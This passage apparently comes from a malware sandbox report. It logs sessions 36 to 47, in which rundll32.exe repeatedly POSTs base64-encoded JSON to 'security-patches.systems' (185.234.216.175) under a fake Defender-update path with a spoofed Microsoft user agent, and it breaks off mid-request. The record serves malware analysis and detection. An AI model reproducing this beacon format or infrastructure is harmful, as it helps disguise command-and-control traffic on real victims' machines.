                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:07.634815931 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:07 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              36192.168.2.449848185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:08.539426088 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:09.995704889 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:09 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              37192.168.2.449854185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:10.263849974 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:11.742902994 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:11 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              38192.168.2.449860185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:12.076178074 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:13.572065115 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:13 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              39192.168.2.449865185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:13.842061996 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:15.288995028 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:14 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              40192.168.2.449866185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:15.560359955 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:17.269184113 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:16 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              41192.168.2.449870185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:17.526896954 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:18.991676092 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:18 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              42192.168.2.449876185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:19.251430988 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:20.714920044 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:20 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              43192.168.2.449881185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:21.039338112 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:22.532628059 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:22 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              44192.168.2.449885185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:22.794574976 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:24.372997046 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:24 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              45192.168.2.449891185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:24.636548042 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:26.069452047 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:25 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              46192.168.2.449895185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:26.417602062 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:27.990735054 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:27 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              47192.168.2.449901185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:28.247754097 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
